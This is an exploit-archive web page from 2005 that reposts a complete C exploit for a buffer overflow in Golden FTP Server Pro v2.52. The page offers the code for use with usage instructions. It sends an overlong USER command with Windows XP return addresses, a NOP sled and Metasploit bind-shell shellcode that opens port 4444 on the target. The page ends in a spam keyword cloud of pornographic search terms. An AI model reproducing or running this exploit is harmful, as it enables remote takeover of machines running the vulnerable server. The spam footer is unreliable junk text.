about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Golden FTP Server Pro Remote "USER" Command Overflow Exploit



2005-04-29 Golden FTP Server Pro Remote "USER" Command Overflow Exploit 
Rated as : Critical 

/*
*
* Golden FTP Server Pro Remote Buffer Overflow Exploit
* Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan and metasploit
* Usage:exploit <targetOs> <targetIp>
*
*/

/*
*
* Vulnerable Versions:
* Golden FTP Server Pro v2.52
*
* Exploit:
* Run the exploit against the server. Afterward, right
* click on the Golden FTP Server Pro icon in the Windows tray and click
* Statistic.
* It will open bind shell on port 4444
*
*/

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

char *target[]= //return addr
{
"\xFC\x18\xD7\x77", //WinXp Sp1 Eng - jmp esp addr
"\xBF\xAC\xDA\x77" //WinXp Sp2 Eng - jmp esp addr
};

char shellcode[] =
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub
http://metasploit.com */
"\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x82"
"\x2a\x64\x94\x83\xeb\xfc\xe2\xf4\x7e\x40\x8f\xdb\x6a\xd3\x9b\x6b"
"\x7d\x4a\xef\xf8\xa6\x0e\xef\xd1\xbe\xa1\x18\x91\xfa\x2b\x8b\x1f"
"\xcd\x32\xef\xcb\xa2\x2b\x8f\x77\xb2\x63\xef\xa0\x09\x2b\x8a\xa5"
"\x42\xb3\xc8\x10\x42\x5e\x63\x55\x48\x27\x65\x56\x69\xde\x5f\xc0"
"\xa6\x02\x11\x77\x09\x75\x40\x95\x69\x4c\xef\x98\xc9\xa1\x3b\x88"
"\x83\xc1\x67\xb8\x09\xa3\x08\xb0\x9e\x4b\xa7\xa5\x42\x4e\xef\xd4"
"\xb2\xa1\x24\x98\x09\x5a\x78\x39\x09\x6a\x6c\xca\xea\xa4\x2a\x9a"
"\x6e\x7a\x9b\x42\xb3\xf1\x02\xc7\xe4\x42\x57\xa6\xea\x5d\x17\xa6"
"\xdd\x7e\x9b\x44\xea\xe1\x89\x68\xb9\x7a\x9b\x42\xdd\xa3\x81\xf2"
"\x03\xc7\x6c\x96\xd7\x40\x66\x6b\x52\x42\xbd\x9d\x77\x87\x33\x6b"
"\x54\x79\x37\xc7\xd1\x79\x27\xc7\xc1\x79\x9b\x44\xe4\x42\x75\xc8"
"\xe4\x79\xed\x75\x17\x42\xc0\x8e\xf2\xed\x33\x6b\x54\x40\x74\xc5"
"\xd7\xd5\xb4\xfc\x26\x87\x4a\x7d\xd5\xd5\xb2\xc7\xd7\xd5\xb4\xfc"
"\x67\x63\xe2\xdd\xd5\xd5\xb2\xc4\xd6\x7e\x31\x6b\x52\xb9\x0c\x73"
"\xfb\xec\x1d\xc3\x7d\xfc\x31\x6b\x52\x4c\x0e\xf0\xe4\x42\x07\xf9"
"\x0b\xcf\x0e\xc4\xdb\x03\xa8\x1d\x65\x40\x20\x1d\x60\x1b\xa4\x67"
"\x28\xd4\x26\xb9\x7c\x68\x48\x07\x0f\x50\x5c\x3f\x29\x81\x0c\xe6"
"\x7c\x99\x72\x6b\xf7\x6e\x9b\x42\xd9\x7d\x36\xc5\xd3\x7b\x0e\x95"
"\xd3\x7b\x31\xc5\x7d\xfa\x0c\x39\x5b\x2f\xaa\xc7\x7d\xfc\x0e\x6b"
"\x7d\x1d\x9b\x44\x09\x7d\x98\x17\x46\x4e\x9b\x42\xd0\xd5\xb4\xfc"
"\x72\xa0\x60\xcb\xd1\xd5\xb2\x6b\x52\x2a\x64\x94";

char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90";

char passreq[] =
"PASS \r\n";

void main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
SOCKET mysocket;
char rec[1024];

if (argc < 3)
{
printf("\r\nGolden FTP Server Pro Remote Buffer Overflow
Exploit\r\n",argv[0]);
printf("Bug Discovered by Reed Arvin
(http://reedarvin.thearvins.com)\r\n");
printf("Exploit coded By ATmaCA\r\n");
printf("Web: atmacasoft.com && spyinstructors.com\r\n");
printf("Credit to kozan and metasploit\r\n");
printf("Usage:\r\nexploit <targetOs>
<targetIp>\r\n\r\n",argv[0]);
printf("Targets:\n");
printf("1 - WinXP SP1 english\n");
printf("2 - WinXP SP2 english\n");
printf("Example:exploit 2 127.0.0.1\n");

return;
}
int targetnum = atoi(argv[1]) - 1;

char *evilbuf =
(char*)malloc(sizeof(userreq)+sizeof(shellcode)+sizeof(nops)
+sizeof(passreq)+7);
strcpy(evilbuf,userreq);
strcat(evilbuf,target[targetnum]);
strcat(evilbuf,nops);
strcat(evilbuf,shellcode);
strcat(evilbuf,"\r\n");
strcat(evilbuf,passreq);
//printf("%s",evilbuf);

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return;



mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET){
printf("Socket error!\r\n");
exit(1);
}

printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(argv[2])) == NULL){
printf("Resolve of %s failed\n", argv[1]);
exit(1);
}

memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons(21);

printf("Connecting...\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
printf("Couldn't connect to host.\n");
exit(1);
}

printf("Connected!...\n");
printf("Waiting for welcome message...\n");
Sleep(10);
recv(mysocket,rec,1024,0);

printf("Sending evil request...\n");
if (send(mysocket,evilbuf, strlen(evilbuf)+1, 0) == -1){
printf("Error Sending evil request.\r\n");
closesocket(mysocket);
exit(1);
}

Sleep(10);
printf("Success.\n");
closesocket(mysocket);
WSACleanup();
}
securitydot.net - 2005-04-29

Advertising

Copyright 2007, SecurityDot
Wed, 09 Dec 2009 07:40:51 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ajwrtcp re Video porn mambo+Remo sexy film radmin MicrosoftT sex shkeelasex phpBB port Boysex wit www.ibagjp shkeelasex www.for-be i feel mys college gi bbs.77yoyo Microsoft sexmovi www.hypfx. tina of se bipasha ba sex roxy index.php? www.psku8. phphtml.ph Microsoft www.nansia wwwpusy.co www.oxxn.c Latin hoes Microsoft DZCP 1.3.2 Nakedsania Shahvat sa www teenpo free sexy pic nacked naked megh wu 2.6.1 Malayporno free india kollyw Www.world t841t sania mirz administra Moo 18qt.com - Anna